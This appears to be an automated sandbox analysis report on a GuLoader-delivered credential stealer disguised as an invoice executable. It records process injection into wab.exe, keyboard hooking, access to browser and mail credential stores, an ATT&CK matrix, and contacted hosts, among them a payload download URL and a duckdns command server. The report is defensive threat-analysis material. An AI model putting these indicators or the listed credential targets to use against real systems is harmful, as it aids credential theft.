              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3590Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5330Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1738Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.7 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405841
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_00406393 FindFirstFileW,FindClose,5_2_00406393
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_004027FB FindFirstFileW,5_2_004027FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E110F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_33E110F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E16580 FindFirstFileExA,7_2_33E16580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeAPI call chain: ExitProcess graph end nodegraph_5-3968
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeAPI call chain: ExitProcess graph end nodegraph_5-3787
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.31180378733.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E12639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_33E12639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,5_2_10001B18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E1724E GetProcessHeap,7_2_33E1724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E14AB4 mov eax, dword ptr fs:[00000030h]7_2_33E14AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E12B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_33E12B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E12639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_33E12639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E160E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_33E160E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeSection loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Program Files (x86)\Windows Mail\wab.exe protection: read writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2FA0000Jump to behavior
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 70A008Jump to behavior
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ghwqzgqbogJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ghwqzgqbogJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ijcjazbdkoecdJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tehbtruwywwhnexkJump to behavior
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.31180803968.0000000000AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4b
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.31180803968.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.26373228419.0000000000AC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2023/10/20 17:44:13 Program Manager]
              Source: wab.exe, 00000007.00000002.31180803968.0000000000AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerU;X
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager\v1.0\;
              Source: wab.exe, 00000007.00000002.31180803968.0000000000AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd;I
              Source: wab.exe, 00000007.00000002.31180803968.0000000000AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager(;
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, paqlgkfs.dat.7.drBinary or memory string: [2023/10/20 17:44:22 Program Manager]
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.31180378733.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager&b
              Source: wab.exe, 00000007.00000002.31180803968.0000000000AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?;>
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E12933 cpuid 7_2_33E12933
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E12264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_33E12264
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,5_2_00406072
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00408043 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,11_2_00408043

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4692, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword11_2_004033E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword11_2_00402DA5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword11_2_00402DA5
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4692, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6356, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4692, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts2
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              Exfiltration Over Bluetooth1
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)212
              Process Injection
              1
              DLL Side-Loading
              2
              Credentials in Registry
              2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated Exfiltration1
              Non-Standard Port
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)1
              Registry Run Keys / Startup Folder
              11
              Masquerading
              1
              Credentials In Files
              28
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              Scheduled Transfer2
              Non-Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Virtualization/Sandbox Evasion
              LSA Secrets31
              Security Software Discovery
              SSH11
              Clipboard Data
              Data Transfer Size Limits212
              Application Layer Protocol
              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation
              Cached Domain Credentials2
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items212
              Process Injection
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Application Window Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1329385 Sample: RC_S23_3274 Or_amento ADP 2... Startdate: 20/10/2023 Architecture: WINDOWS Score: 100 38 ourt2949aslumes9.duckdns.org 2->38 40 kapsnovin.com 2->40 42 geoplugin.net 2->42 56 Snort IDS alert for network traffic 2->56 58 Found malware configuration 2->58 60 Yara detected GuLoader 2->60 62 6 other signatures 2->62 8 RC_S23_3274 Or_amento ADP 231019_5_5009.exe 1 55 2->8         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->26 dropped 28 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 8->28 dropped 30 C:\Users\user\AppData\Local\...\System.dll, PE32 8->30 dropped 32 2 other files (none is malicious) 8->32 dropped 64 Writes to foreign memory regions 8->64 66 Maps a DLL or memory area into another process 8->66 12 wab.exe 4 17 8->12         started        signatures6 process7 dnsIp8 44 94.156.6.253, 2402, 50031, 50032 NET1-ASBG Bulgaria 12->44 46 kapsnovin.com 77.238.121.250, 50030, 80 ASIATECHIR Iran (ISLAMIC Republic Of) 12->46 48 geoplugin.net 178.237.33.50, 50033, 80 ATOM86-ASATOM86NL Netherlands 12->48 34 C:\Users\user\AppData\Roaming\paqlgkfs.dat, data 12->34 dropped 36 C:\Users\user\AppData\...mphasising.exe, PE32 12->36 dropped 68 Maps a DLL or memory area into another process 12->68 70 Installs a global keyboard hook 12->70 17 wab.exe 1 12->17         started        20 wab.exe 1 12->20         started        22 wab.exe 2 12->22         started        24 wab.exe 12->24         started        file9 signatures10 process11 signatures12 50 Tries to steal Instant Messenger accounts or passwords 17->50 52 Tries to harvest and steal browser information (history, passwords, etc) 17->52 54 Tries to steal Mail credentials (via file / registry access) 20->54

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              RC_S23_3274 Or_amento ADP 231019_5_5009.exe3%ReversingLabsWin32.Trojan.Generic
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Surmulendes\Emphasising.exe3%ReversingLabsWin32.Trojan.Generic
              C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\fusty\trivalente.vid0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nswC001.tmp\BgImage.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nswC001.tmp\System.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nswC001.tmp\nsDialogs.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nswC001.tmp\nsExec.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/ads-programmable0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/botguard-scs0%Avira URL Cloudsafe
              https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b70%Avira URL Cloudsafe
              http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl00%Avira URL Cloudsafe
              https://odc.offi0%Avira URL Cloudsafe
              https://btloader.com/tag?o=6208086025961472&upapi=true0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%20%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe
              http://ocsp.sca1b.amazontrust.com060%Avira URL Cloudsafe
              http://geoplugin.net/0%Avira URL Cloudsafe
              https://contextual.med0%Avira URL Cloudsafe
              http://crl.rootg2.amazontrust.com/rootg2.crl00%Avira URL Cloudsafe
              https://pki.goog/repository/00%Avira URL Cloudsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp560%Avira URL Cloudsafe
              https://tpc.g0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
              http://ocsp.sectigo.com00%Avira URL Cloudsafe
              http://crl.pki.goog/gsr1/gsr1.crl0;0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              https://2542116.fls.doublecli0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binForuCrounif-pid.com/KvGfOfeyMpEaqpzI164.bin0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/botguard-scs0%Avira URL Cloudsafe
              http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl00%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der070%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/adspam-signals-scs0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpCU0%Avira URL Cloudsafe
              https://2542116.fls.double0%Avira URL Cloudsafe
              https://sb.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
              http://pki.goog/gsr1/gsr1.crt020%Avira URL Cloudsafe
              https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.0%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der0$0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalse
                unknown
                kapsnovin.com
                77.238.121.250
                truetrue
                  unknown
                  ourt2949aslumes9.duckdns.org
                  unknown
                  unknowntrue
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://odc.offiwab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.jsbhv1B7E.tmp.10.drfalse
                      high
                      http://www.imvu.comrwab.exe, 00000007.00000002.31198333561.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.26338031304.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpgbhv1B7E.tmp.10.drfalse
                        high
                        https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.pngbhv1B7E.tmp.10.drfalse
                          high
                          https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.jsbhv1B7E.tmp.10.drfalse
                            high
                            https://csp.withgoogle.com/csp/ads-programmablebhv1B7E.tmp.10.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.nirsoft.netwab.exe, 0000000A.00000002.26373053097.00000000006F3000.00000004.00000010.00020000.00000000.sdmpfalse
                              high
                              https://aefd.nelreports.net/api/report?cat=bingaotakbhv1B7E.tmp.10.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2bhv1B7E.tmp.10.drfalse
                                high
                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684bhv1B7E.tmp.10.drfalse
                                  high
                                  https://deff.nelreports.net/api/report?cat=msnbhv1B7E.tmp.10.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.com/chrome/wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drfalse
                                    high
                                    http://cdp.thawte.com/ThawteRSACA2018.crl0Lbhv1B7E.tmp.10.drfalse
                                      high
                                      https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7bhv1B7E.tmp.10.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.google.com/recaptcha/apiwab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://csp.withgoogle.com/csp/botguard-scsbhv1B7E.tmp.10.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-aclbhv1B7E.tmp.10.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://s1.adform.net/Banners/Elements/Files/2070608/10170131/10170131.js?ADFassetID=10170131&bv=258bhv1B7E.tmp.10.drfalse
                                          high
                                          https://www.google.com/chrome/https://wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0bhv1B7E.tmp.10.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.msn.combhv1B7E.tmp.10.drfalse
                                              high
                                              https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80bhv1B7E.tmp.10.drfalse
                                                high
                                                https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wobhv1B7E.tmp.10.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://btloader.com/tag?o=6208086025961472&upapi=truebhv1B7E.tmp.10.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.imvu.comatawab.exe, 0000000C.00000002.26338608516.000000000335D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3bhv1B7E.tmp.10.drfalse
                                                  high
                                                  https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgbhv1B7E.tmp.10.drfalse
                                                    high
                                                    https://b1sync.zemanta.com/usersync/msn/?puid=101156F9176C6E98058F466E16B36FACbhv1B7E.tmp.10.drfalse
                                                      high
                                                      https://contextual.medwab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2bhv1B7E.tmp.10.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843bhv1B7E.tmp.10.drfalse
                                                        high
                                                        http://ocsp.sca1b.amazontrust.com06bhv1B7E.tmp.10.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://certs.godaddy.com/repository/1301bhv1B7E.tmp.10.drfalse
                                                          high
                                                          http://www.imvu.comwab.exe, wab.exe, 0000000C.00000002.26338031304.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.26338608516.000000000335D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contextual.media.net/checkswab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://ocsp.rootca1.amazontrust.com0:bhv1B7E.tmp.10.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://certs.godaddy.com/repository/0bhv1B7E.tmp.10.drfalse
                                                                high
                                                                https://pki.goog/repository/0bhv1B7E.tmp.10.drfalse
